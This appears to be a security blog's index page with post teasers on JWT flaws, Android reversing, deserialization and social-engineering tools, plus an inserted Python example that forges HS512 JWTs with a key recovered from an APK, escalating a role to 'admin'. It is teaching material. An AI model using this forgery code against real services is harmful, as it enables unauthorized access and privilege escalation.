Android Reversing to Find JWT Key

February 06, 2018

In the previous blog post, I discussed JWTs and their common vulnerabilities. There, I mentioned a recent engagement where I discovered an Android application signing JWTs using HS512 on the client side, which set in motion a hunt to find the symmetric key and forge modified JWTs. This blog post will cover the basic Android hacking techniques and methodology used along the way. If you are new to Android application testing, this blog post will be a great resource to learn from!
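As an added example (not code from the original post or from the application it describes), the following shows the end state of the hunt the teaser describes: once the HS512 symmetric key has been recovered from the client, the server's own verification logic accepts any payload re-signed with it. The key, claims and helper names here are constructed for illustration; only the standard library is used.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    """JWT base64url: URL-safe alphabet, padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the padding JWT strips before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _json_segment(obj: dict) -> str:
    # Compact, key-sorted JSON so the encoding is deterministic.
    return b64url_encode(json.dumps(obj, separators=(",", ":"), sort_keys=True).encode())


def sign_hs512(payload: dict, key: bytes) -> str:
    """Produce header.payload.signature using HMAC-SHA512 over the signing input."""
    signing_input = f"{_json_segment({'alg': 'HS512', 'typ': 'JWT'})}.{_json_segment(payload)}"
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha512).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify_hs512(token: str, key: bytes):
    """Return the payload if the token is a valid HS512 JWT under `key`, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except (ValueError, json.JSONDecodeError):
        return None
    # Pin the algorithm: never let the token choose ("none", RS->HS confusion, ...).
    if header.get("alg") != "HS512":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha512).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(b64url_decode(payload_b64))


def forge_token(original: str, key: bytes, **changes) -> str:
    """Attacker step: decode a captured token, edit claims, re-sign with the recovered key."""
    payload = verify_hs512(original, key)
    if payload is None:
        raise ValueError("recovered key does not verify the captured token; keep hunting")
    payload.update(changes)
    return sign_hs512(payload, key)


def tamper_without_key(original: str, **changes) -> str:
    """Control case: edit the payload but leave the old signature in place."""
    header_b64, payload_b64, sig_b64 = original.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(changes)
    return f"{header_b64}.{_json_segment(payload)}.{sig_b64}"


# Constructed values for the walkthrough; the real app's key and claims are not shown here.
RECOVERED_KEY = b"example-key-recovered-from-apk"
ORIGINAL = sign_hs512({"sub": "1234", "role": "user"}, RECOVERED_KEY)   # what the app issues
FORGED = forge_token(ORIGINAL, RECOVERED_KEY, role="admin")             # what the attacker sends
TAMPERED = tamper_without_key(ORIGINAL, role="admin")                   # rejected: signature no longer matches

if __name__ == "__main__":
    print("original :", verify_hs512(ORIGINAL, RECOVERED_KEY))
    print("forged   :", verify_hs512(FORGED, RECOVERED_KEY))
    print("tampered :", verify_hs512(TAMPERED, RECOVERED_KEY))
```

The point of the control case is that HS512 itself is not the weakness; a server that verifies correctly rejects the tampered token. The flaw is that a symmetric key shipped inside an APK is, by definition, in the attacker's hands, so anything it signs can be forged.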

JWT Hacking 101

December 07, 2017

As JavaScript continues its quest for world domination, JSON Web Tokens (JWTs) are becoming more and more prevalent in application security. Many applications use them, so it has become very important for me to know as much as I can and I want to share what I’ve learned. In this blog post I will discuss…

Code Featured on Mr. Robot (USA Network)

November 30, 2017

Last night’s episode of Mr. Robot (eps3.6_fredrick+tanya.chk) contained some code I wrote for a WebLogic deserialization vulnerability in my earlier blog post, Hands on with WebLogic Serialization Vulnerability. I still can’t quite believe it! Chris Frohoff (@frohoff), the author of the “ysoserial” deserialization tool, caught it and tagged me on Twitter. Much thanks to him…

SE Village @ DC25: Social Engineering with Web Analytics

July 31, 2017

This weekend I was lucky enough to have the opportunity to speak at the Social Engineering Village at DefCon25. I gave a talk regarding my research with using Google Analytics for social engineering. I made a new tool called google-analytics-attack-ng that has many new features compared to its predecessor in my previous blog post. In addition to…

Building IoT: A Hacker’s Journey

May 02, 2017

Being a first time home owner means a lot of different things, but in particular I’ve found it means fixing a lot of things. A garage door opener has been on my fix-it list for a while and I finally got around to solving it! This blog post will cover the IoT device I created and the security protections I baked in along the way!

DakotaCon 2017 CTF Write Ups

April 12, 2017

I was able to attend DakotaCon in Madison, SD again this year and, staying true to the precedent from last year, it was a great time! The time I didn’t spend in the talks or training was spent on the CTF, in which my team and I finished in 1st place! This blog post contains write-ups for various challenges.

Magic Mirror with DNS Filtering

February 06, 2017

Over a year ago I came across a Raspberry Pi project called Magic Mirror. The project uses a one-way mirror to overlay a reflective property on a computer monitor, while allowing display elements to “magically” appear on the mirror. I liked this project and went ahead and built my own, but with a twist. This blog post will briefly cover my Magic Mirror build and how I use it to manage and filter DNS on my network.

Social Engineering with Google Analytics

September 25, 2016

If a sophisticated attacker could flood a victim’s Google Analytics portal with referrals from a domain the attacker controls, the victim may investigate the referrals and browse to the attacker-controlled domain. Sneaky! This blog post covers the development and usage of a Social Engineering Toolkit (SET) module I wrote called “Google Analytics Attack”.

Referer Redirection and Its Inconspicuous Danger

August 16, 2016

Recently I noticed some peculiar behavior on a web application; it would openly redirect to whatever the ‘Referer’ header was set to in the request. At first I thought that seemed pretty harmless, but after recognizing it as unsanitized input, I was determined to come up with a use case for when this behavior could be used for evil.

KeePass and Eating Your Own Dog Food

July 21, 2016

For a while now the information security community has been griping about the need for better passwords. I decided it was time to ‘eat my own dog food’ and take my personal password security to the next level by using KeePass.